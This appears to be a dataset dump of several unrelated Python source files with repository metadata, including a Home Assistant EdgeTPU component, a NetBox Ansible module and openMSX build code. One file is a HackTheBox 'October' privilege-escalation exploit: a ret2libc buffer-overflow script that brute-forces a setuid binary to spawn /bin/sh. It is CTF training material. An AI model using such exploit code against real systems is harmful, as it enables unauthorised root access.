] | 1 | 2022-03-18T02:53:26.000Z | 2022-03-18T02:53:26.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-02-26T22:33:51.000Z | 2022-02-26T22:33:51.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | null | null | null | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| 21.916667 | 65 | 0.707224 | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| true | true |
f72ebf692ce4d13b38c4b06937c4b2c86a362b7e | 810 | py | Python | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | 1 | 2021-07-27T12:56:03.000Z | 2021-07-27T12:56:03.000Z | #
# Privilege Escalation Exploit for hackTheBox October
#
# From IppSec https://youtu.be/K05mJazHhF4
#
from subprocess import call
import struct
# libc base address using:
# ldd /usr/local/bin/ovrflw | grep libc
libc_base_addr = 0xb75e0000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
exit_off = 0x00033260
# strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| 21.891892 | 62 | 0.691358 |
from subprocess import call
import struct
libc_base_addr = 0xb75e0000
system_off = 0x00040310
exit_off = 0x00033260
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| true | true |
f72ec08d1ab18ada95fe41cc5b706441b9da8ce8 | 6,871 | py | Python | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | """Support for performing EdgeTPU classification on images."""
import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the EdgeTPU image processing platform."""
try:
# Verify that the TensorFlow Object Detection API is pre-installed
# pylint: disable=unused-import,unused-variable
from edgetpu.detection.engine import DetectionEngine
except ImportError:
# pylint: disable=line-too-long
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ") # noqa
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
"""Representation of an EdgeTPU image processor."""
def __init__(self, hass, camera_entity, name, config):
"""Initialize the EdgeTPU entity."""
from edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
# ATTR_SUMMARY: {item: len(values)
# for item, values in self._matches.items()},
ATTR_TOTAL_MATCHES: self._total_matches
}
# Function to read labels from text files.
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
"""Process the image."""
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
# Open image.
# _LOGGER.info("image = %s", image)
import io
img = Image.open(io.BytesIO(bytearray(image)))
# img.save("/tmp/test.jpg")
draw = ImageDraw.Draw(img)
# Run inference.
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
# Display result.
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
# Draw a rectangle.
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| 35.973822 | 98 | 0.627129 | import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
try:
from edgetpu.detection.engine import DetectionEngine
except ImportError:
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ")
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
def __init__(self, hass, camera_entity, name, config):
from edgetpu.detection.engine import DetectionEngine
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
return self._camera_entity
@property
def name(self):
return self._name
@property
def state(self):
return self._total_matches
@property
def device_state_attributes(self):
return {
ATTR_MATCHES: self._matches,
ATTR_TOTAL_MATCHES: self._total_matches
}
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
import io
img = Image.open(io.BytesIO(bytearray(image)))
draw = ImageDraw.Draw(img)
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| true | true |
f72ec0d8575ad1e8a480b6dfdd46dd3ea6886bf8 | 852 | py | Python | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2017-08-25T07:17:04.000Z | 2017-08-25T07:17:04.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2015-11-10T01:07:54.000Z | 2015-11-10T01:07:54.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24) # 6 months
# Run after the cleanup is actually finished, but before analyze
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
# Vacuum can take a long time, and is not needed frequently
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| 40.571429 | 91 | 0.766432 | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24)
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| true | true |
f72ec1736a03659240a215c3e1fbd08ab2fda8f4 | 4,325 | py | Python | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Mikhail Yohman (@FragmentedPacket)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
"""
Main entry point for module execution
"""
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__": # pragma: no cover
main()
| 26.697531 | 97 | 0.652948 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__":
main()
| true | true |
f72ec1db4dbbb5d7b20d5ea18b138b8111539f7c | 17,753 | py | Python | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5 | 2015-02-27T21:42:28.000Z | 2021-10-10T23:36:08.000Z | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2015-06-15T09:57:56.000Z | 2017-05-14T01:11:48.000Z | # Some notes about static linking:
# There are two ways of linking to static library: using the -l command line
# option or specifying the full path to the library file as one of the inputs.
# When using the -l option, the library search paths will be searched for a
# dynamic version of the library, if that is not found, the search paths will
# be searched for a static version of the library. This means we cannot force
# static linking of a library this way. It is possible to force static linking
# of all libraries, but we want to control it per library.
# Conclusion: We have to specify the full path to each library that should be
# linked statically.
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
# TODO: A library can give an application compile time and run time
# dependencies on other libraries. For example SDL_ttf depends on
# FreeType only at run time, but depends on SDL both compile time
# and run time, since SDL is part of its interface and FreeType is
# only used by the implementation. As a result, it is possible to
# compile against SDL_ttf without having the FreeType headers
# installed. But our getCompileFlags() does not support this.
# In pkg-config these are called private dependencies.
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform): # pylint: disable-msg=W0613
'''Returns True iff this library is a system library on the given
platform.
A system library is a library that is available systemwide in the
minimal installation of the OS.
The default implementation returns False.
'''
return False
@classmethod
def getConfigScript( # pylint: disable-msg=W0613
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
# TODO: A generic mechanism for locating config scripts in SDKs.
# Note that distroRoot is for non-system libs only.
# Trying a path relative to the compiler location would
# probably work well.
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform): # pylint: disable-msg=W0613
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform): # pylint: disable-msg=W0613
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
'''Returns the version of this library, "unknown" if there is no
mechanism to retrieve the version, None if there is a mechanism
to retrieve the version but it failed, or a callable that takes a
CompileCommand and a log stream as its arguments and returns the
version or None if retrieval failed.
'''
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
# FreeType is located in the X11 tree, not the ports tree.
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
# On *BSD, OpenGL is in ports, not in the base system.
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
